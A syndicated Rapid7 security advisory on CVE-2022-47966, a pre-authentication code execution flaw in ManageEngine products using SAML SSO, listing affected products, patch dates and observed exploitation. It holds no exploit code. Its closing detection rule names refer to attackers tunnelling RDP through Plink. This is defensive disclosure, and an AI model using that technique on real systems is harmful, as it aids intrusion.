CVE-2022-47966: Rapid7 Observed Exploitation of Critical ManageEngine Vulnerability

Post Syndicated from Glenn Thorpe original https://blog.rapid7.com/2023/01/19/etr-cve-2022-47966-rapid7-observed-exploitation-of-critical-manageengine-vulnerability/

CVE-2022-47966: Rapid7 Observed Exploitation of Critical ManageEngine Vulnerability

Emergent threats evolve quickly, and as we learn more about this vulnerability, this blog post will evolve, too.

Rapid7 is responding to various compromises arising from the exploitation of CVE-2022-47966, a pre-authentication remote code execution (RCE) vulnerability impacting at least 24 on-premise ManageEngine products. CVE-2022-47966 stems from a vulnerable third-party dependency on Apache Santuario.
Several of the affected products are extremely popular with organizations and attackers, including ADSelfService Plus and ServiceDesk Plus. Patches were released in October and November of 2022; the exact timing of fixed version releases varies by product.

Organizations using any of the affected products listed in ManageEngine’s advisory should update immediately and review unpatched systems for signs of compromise, as exploit code is publicly available and exploitation has already begun.

Affected products

See ManageEngine’s advisory for CVE-2022-47966 for updated product and version information.

At the time of publication, the vulnerable products are subject to certain caveats according to Zoho’s advisory.

Trending
Amazon CloudWatch metrics for Amazon OpenSearch Service storage and shard skew health

The following list of vulnerable products is subject to the caveats below:
* Vulnerable if configured SAML-based SSO and it is currently active.
** Vulnerable if configured SAML-based SSO at least once in the past, regardless of the current SAML-based SSO status.

  • Access Manager Plus*
  • Active Directory 360**
  • ADAudit Plus**
  • ADManager Plus**
  • ADSelfService Plus**
  • Analytics Plus*
  • Application Control Plus*
  • Asset Explorer**
  • Browser Security Plus*
  • Device Control Plus*
  • Endpoint Central*
  • Endpoint Central MSP*
  • Endpoint DLP*
  • Key Manager Plus*
  • OS Deployer*
  • PAM 360*
  • Password Manager Pro*
  • Patch Manager Plus*
  • Remote Access Plus*
  • Remote Monitoring and Management (RMM)*
  • ServiceDesk Plus**
  • ServiceDesk Plus MSP**
  • SupportCenter Plus**
  • Vulnerability Manager Plus*

Background

ManageEngine released patches for these products in October and November of 2022.

Rapid7 observed exploitation across organizations as early as January 18, 2023.

Security firm Horizon3 released technical information with a proof of concept (PoC) on January 19, 2023.

Rapid7 customers

InsightVM & Nexpose customers: Our researchers are currently evaluating the feasibility of adding vulnerability checks for as many of the affected products as possible. We expect coverage for ManageEngine ServiceDesk Plus to be available in the January 19 content release.

InsightIDR & Managed Detection & Response customers: the previously existing detections have been triggering upon exploitation:

  • Suspicious Process – Zoho ManageEngine Spawns Child
  • Attacker Technique – Plink Redirecting RDP
  • Attacker Technique – Renamed Plink